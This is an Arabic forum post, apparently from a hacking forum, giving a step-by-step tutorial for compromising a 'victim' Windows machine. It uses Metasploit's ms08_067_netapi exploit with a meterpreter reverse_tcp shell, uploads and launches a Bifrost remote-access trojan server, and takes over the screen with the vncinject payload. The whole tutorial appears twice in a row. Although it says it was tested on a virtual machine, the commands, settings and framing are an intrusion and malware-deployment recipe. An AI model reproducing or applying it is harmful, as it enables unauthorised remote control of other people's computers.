ASDELY-ScOrPiOn
11-03-2009, 08:21 PM
السلام عليكم
طريقة اختراق جهاز الضحية بالميتا ورفع سيرفر بيفروست
وكما سأتحدث عن سيطرة الجهاز بإستخدام playoad windows/vncinject
تم تطبيق الشرح على جهاز افتراضي
الشرح
http://img194.imageshack.us/img194/9891/20090702183620.png
إضغط علي window وبعد ذلك علي console ستفتح لنا النافذة التالية نكتب show exploits
http://img27.imageshack.us/img27/5264/exploitscmd3.png
ونختار windows/smb/ms08_067_netapi
show payloads
http://img25.imageshack.us/img25/3329/payloads.png
ونختار windows/meterpreter/reverse_tcp
أو نختارها مباشرة كما ف الصورة
http://img16.imageshack.us/img16/7027/setexploit5.png
والآن نقوم بتحديد IP الضحية وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101
ولا تنسي أن تضع قم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter
http://img139.imageshack.us/img139/4131/launchexploit6.png
كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445
**************************************************
لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\
كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد
C:\Program Files\****sploit\Framework3
http://img200.imageshack.us/img200/998/uploadserver6.png
بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:
use -m process
execute -f cmd.exe -c
interact 3
كما في الصورة حسب رقم channel أو session المفتوح
http://img37.imageshack.us/img37/6270/73006251.png
لتشغيل السيرفر start server.exe
*******************************************
وكما توضح الصورة نجاح تحميل السيرفر
http://img213.imageshack.us/img213/9439/70700213.png
والصور تعبر عن نفسها
http://img190.imageshack.us/img190/6250/30769969.png
شاشة الضحية
http://img197.imageshack.us/img197/482/55987753.png
لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال
windows/meterpreter/smb/ms08_067_netapi
set windows/vncinject/reverse_tcp
بتطبيق الثغرة ستفتح لنا الشاشة التالية
http://img269.imageshack.us/img269/1700/11vncinject.png
أعتقد الشرح واضح
تحياتي لكم
وإلي بده ينقل يذكر المصدر مع الرابط :D
طريقة اختراق جهاز الضحية بالميتا ورفع سيرفر بيفروست
وكما سأتحدث عن سيطرة الجهاز بإستخدام playoad windows/vncinject
تم تطبيق الشرح على جهاز افتراضي
الشرح
http://img194.imageshack.us/img194/9891/20090702183620.png
إضغط علي window وبعد ذلك علي console ستفتح لنا النافذة التالية نكتب show exploits
http://img27.imageshack.us/img27/5264/exploitscmd3.png
ونختار windows/smb/ms08_067_netapi
show payloads
http://img25.imageshack.us/img25/3329/payloads.png
ونختار windows/meterpreter/reverse_tcp
أو نختارها مباشرة كما ف الصورة
http://img16.imageshack.us/img16/7027/setexploit5.png
والآن نقوم بتحديد IP الضحية وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101
ولا تنسي أن تضع قم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter
http://img139.imageshack.us/img139/4131/launchexploit6.png
كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445
**************************************************
لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\
كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد
C:\Program Files\****sploit\Framework3
http://img200.imageshack.us/img200/998/uploadserver6.png
بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:
use -m process
execute -f cmd.exe -c
interact 3
كما في الصورة حسب رقم channel أو session المفتوح
http://img37.imageshack.us/img37/6270/73006251.png
لتشغيل السيرفر start server.exe
*******************************************
وكما توضح الصورة نجاح تحميل السيرفر
http://img213.imageshack.us/img213/9439/70700213.png
والصور تعبر عن نفسها
http://img190.imageshack.us/img190/6250/30769969.png
شاشة الضحية
http://img197.imageshack.us/img197/482/55987753.png
لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال
windows/meterpreter/smb/ms08_067_netapi
set windows/vncinject/reverse_tcp
بتطبيق الثغرة ستفتح لنا الشاشة التالية
http://img269.imageshack.us/img269/1700/11vncinject.png
أعتقد الشرح واضح
تحياتي لكم
وإلي بده ينقل يذكر المصدر مع الرابط :D